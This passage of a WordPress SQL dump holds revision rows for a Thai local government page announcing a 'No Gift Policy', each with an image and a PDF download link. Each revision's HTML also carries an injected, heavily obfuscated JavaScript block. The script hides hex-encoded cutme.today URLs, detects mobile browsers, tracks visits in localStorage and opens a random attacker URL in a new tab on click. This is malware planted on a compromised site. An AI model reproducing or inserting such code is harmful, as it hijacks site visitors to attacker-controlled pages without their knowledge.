_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:35:18','2025-06-09 06:35:18','',859,'http://pakhaeng.ssk.in.th/?p=1300',0,'revision','',0),
(1301,1,'2025-06-09 13:37:25','2025-06-09 06:37:25','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:37:25','2025-06-09 06:37:25','',859,'http://pakhaeng.ssk.in.th/?p=1301',0,'revision','',0),
(1302,1,'2025-06-09 13:37:26','2025-06-09 06:37:26','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 